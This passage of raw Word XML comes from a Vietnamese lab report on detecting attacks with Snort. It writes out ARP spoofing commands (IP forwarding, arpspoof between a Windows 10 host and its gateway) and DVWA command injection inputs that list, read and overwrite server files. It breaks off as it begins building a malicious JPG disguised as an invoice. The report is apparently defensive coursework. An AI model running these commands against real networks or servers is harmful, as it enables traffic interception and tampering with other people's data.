        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kích hoạt IP Forwarding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên Kali Linux để có thể chuyển tiếp các gói tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B497D8">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="10"/>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echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF29B88">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>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Sử dụng ARP Spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  gửi lưu lượng qua Kali:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">giả mạo ARP từ Kali đến </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>indows 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, làm cho </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>indows 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> gửi tất cả lưu lượng đến Kali thay vì </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Gateway</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F84303">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo arpspoof -i eth0 -t 192.168.8.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.8.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78672561">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5748655" cy="5197475"/>
            <wp:effectExtent l="0" t="0" r="12065" b="14605"/>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16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5748655" cy="5197475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="590DE1EF">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>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lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">iả mạo ARP từ Kali đến </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Gateway</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, làm cho </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Gateway</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> gửi tất cả lưu lượng đến Kali thay vì </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239B6388">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo arpspoof -i eth0 -t 192.168.8.254 192.168.8.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EDC4FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5753100" cy="5044440"/>
            <wp:effectExtent l="0" t="0" r="762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5753100" cy="5044440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E31A64">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireshar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>k:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FBF63D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5749290" cy="5457825"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>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18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5749290" cy="5457825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B29174">
      <w:pPr>
        <w:pStyle w:val="12"/>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"http://demo.testfire.net/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71115FCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5750560" cy="4218305"/>
            <wp:effectExtent l="0" t="0" r="10160" b="317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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5750560" cy="4218305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F068A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185A4B80">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>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Phát hiện tấn công Command injection trên DVWA bằng Snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B9C61">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Trên máy nạn nhân chạy server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA1C49C">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3876675"/>
            <wp:effectExtent l="0" t="0" r="11430" b="9525"/>
            <wp:docPr id="30"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="3876675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA1E843">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Trên máy tấn công </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C33486">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Đăng nhập vào trình duyệt dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74626ABF">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lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2800B16A">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3533775"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1905"/>
            <wp:docPr id="31"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5" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="3533775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E62B7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>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t xml:space="preserve">Vào mục </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>command injection nhập ||dir C:\ để kiểm tra thư mục trên máy server ta thấy file test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C2E4AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE2184F">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3695700"/>
            <wp:effectExtent l="0" t="0" r="11430" b="7620"/>
            <wp:docPr id="32"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6" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="3695700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="604A12BA">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t>Bước tiếp theo nhập || more C:\text.txt để kiểm tra nội dung file test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED71E86">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734050" cy="4562475"/>
            <wp:effectExtent l="0" t="0" r="11430" b="9525"/>
            <wp:docPr id="33"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7" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="4562475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC0B20">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Sau đó thực hiện đổi nội dung trong file đó</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Nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72209560">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127.0.0.1 &amp;&amp; cmd /c "(echo username abc pass 123)&gt;C:\xampp\tmp\test.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38690A25">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Kiểm tra lại file</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127.0.0.1 &amp;&amp; type C:\xampp\tmp\test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C079B">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p>
    <w:p w14:paraId="660977B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5514975" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="34"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8" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5514975" cy="2819400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003E5EB">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đã đổi thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0241EA12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Phát hiện tấn công che dấu mã độc trong JPG  bằng Snort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1512EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo file JPG độc hại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">legitimate_looking_invoice.jpg </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B146492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B2028E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
